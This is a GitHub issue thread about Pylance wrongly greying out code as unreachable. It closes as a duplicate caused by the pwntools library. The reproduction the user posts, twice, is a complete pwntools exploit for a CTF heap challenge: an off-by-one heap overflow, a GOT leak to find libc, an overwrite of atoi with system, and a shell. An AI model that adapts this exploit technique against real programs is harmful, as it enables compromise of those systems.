### ISSUE TITLE
False "variable is  unreachable" message

### ISSUE THREAD

**Issue by sf2333** [microsoft/pylance-release#2502] opened 2022-03-23 13:20 UTC
## Environment data

-   Language Server version: Pylance language server 2022.3.2
-   OS and version: Windows 10 64bit
-   Python version (& distribution if applicable, e.g. Anaconda): 3.5.2
- when I use VScode The Remote - SSH extension meet this bug.
## Expected behaviour

The 44 and 45 row code should be  highlighting.

## Actual behaviour
The 44 and 45 row code is gray and the  variable content is marked as "content" is not unreachable.
![image-20220323210845203](https://my-tc-1308282641.cos.ap-guangzhou.myqcloud.com/markdown/typora-user-images/image-20220323210845203.png)
![image-20220323211036800](https://my-tc-1308282641.cos.ap-guangzhou.myqcloud.com/markdown/typora-user-images/image-20220323211036800.png)

**Comment by erictraut** [comment] 2022-03-23 13:25
Please provide a minimal self-contained code sample that demonstrates the problem. We won't be able to debug this from a screen shot.

**Comment by sf2333** [comment] 2022-03-27 07:13
`from pwn import *
context.log_level = 'debug'

p = process('./heapcreator')
e = ELF('./heapcreator')
libc = e.libc

def sla(signal, content):
  p.sendlineafter(signal, content)

def r_a64(signal):
  return u64(p.recvuntil(signal)[-6:].ljust(8,'\x00'))

def ss(context):
  success(context)

def dbg():
  gdb.attach(p)
  pause()

def libcfunc(libc_base,name):
    return libc_base + libc.symbols[name]

def create(ct,size):
    sla("Your choice :",'1')
    sla("Size of Heap : ",str(size))
    sla("Content of heap:",ct)

def edit(idx,ct):
    sla("Your choice :",'2')
    sla("Index :",str(idx))
    sla("Content of heap : ",ct)

def show(idx):
    sla("Your choice :",'3')
    sla("Index :",str(idx))

def delete(idx):
    sla("Your choice :",'4')
    sla("Index :",str(idx))

create("a",0x18) #0
create("b",0x10) #1
payload = 'a' * 0x18 + '\x41'
edit(0,payload)
delete(1)

create('a',0x30) #1
payload = 'a' * 0x20 + p64(0x8) + p64(e.got['atoi'])
edit(1,payload)
show(1)
atoi_got = r_a64('\x7f')
libc_base = atoi_got - libc.sym['atoi']
system = libcfunc(libc_base,"system")
ss("system:" + hex(system))

edit(1,p64(system)+'\x00')
sla("Your choice :",'sh\x00\x00')

p.interactive()`

**Comment by sf2333** [comment] 2022-03-27 07:14
```
from pwn import *
context.log_level = 'debug'

p = process('./heapcreator')
e = ELF('./heapcreator')
libc = e.libc

def sla(signal, content):
  p.sendlineafter(signal, content)

def r_a64(signal):
  return u64(p.recvuntil(signal)[-6:].ljust(8,'\x00'))

def ss(context):
  success(context)

def dbg():
  gdb.attach(p)
  pause()

def libcfunc(libc_base,name):
    return libc_base + libc.symbols[name]

def create(ct,size):
    sla("Your choice :",'1')
    sla("Size of Heap : ",str(size))
    sla("Content of heap:",ct)

def edit(idx,ct):
    sla("Your choice :",'2')
    sla("Index :",str(idx))
    sla("Content of heap : ",ct)

def show(idx):
    sla("Your choice :",'3')
    sla("Index :",str(idx))

def delete(idx):
    sla("Your choice :",'4')
    sla("Index :",str(idx))

create("a",0x18) #0
create("b",0x10) #1
payload = 'a' * 0x18 + '\x41'
edit(0,payload)
delete(1)

create('a',0x30) #1
payload = 'a' * 0x20 + p64(0x8) + p64(e.got['atoi'])
edit(1,payload)
show(1)
atoi_got = r_a64('\x7f')
libc_base = atoi_got - libc.sym['atoi']
system = libcfunc(libc_base,"system")
ss("system:" + hex(system))

edit(1,p64(system)+'\x00')
sla("Your choice :",'sh\x00\x00')

p.interactive()
```

**Comment by sf2333** [comment] 2022-03-27 07:15
This is a script about THE CTF contest PWN question

**Comment by erictraut** [comment] 2022-03-27 13:46
This is a duplicate of https://github.com/microsoft/pylance-release/issues/1847. It's an issue with the pwntools library. Please report the issue to the library's maintainers.

**Comment by sf2333** [comment] 2022-03-28 02:53
Thanks for your link，the problem have been  solved.

**Closed** 2022-03-28 17:47 UTC
Labels: waiting for user response
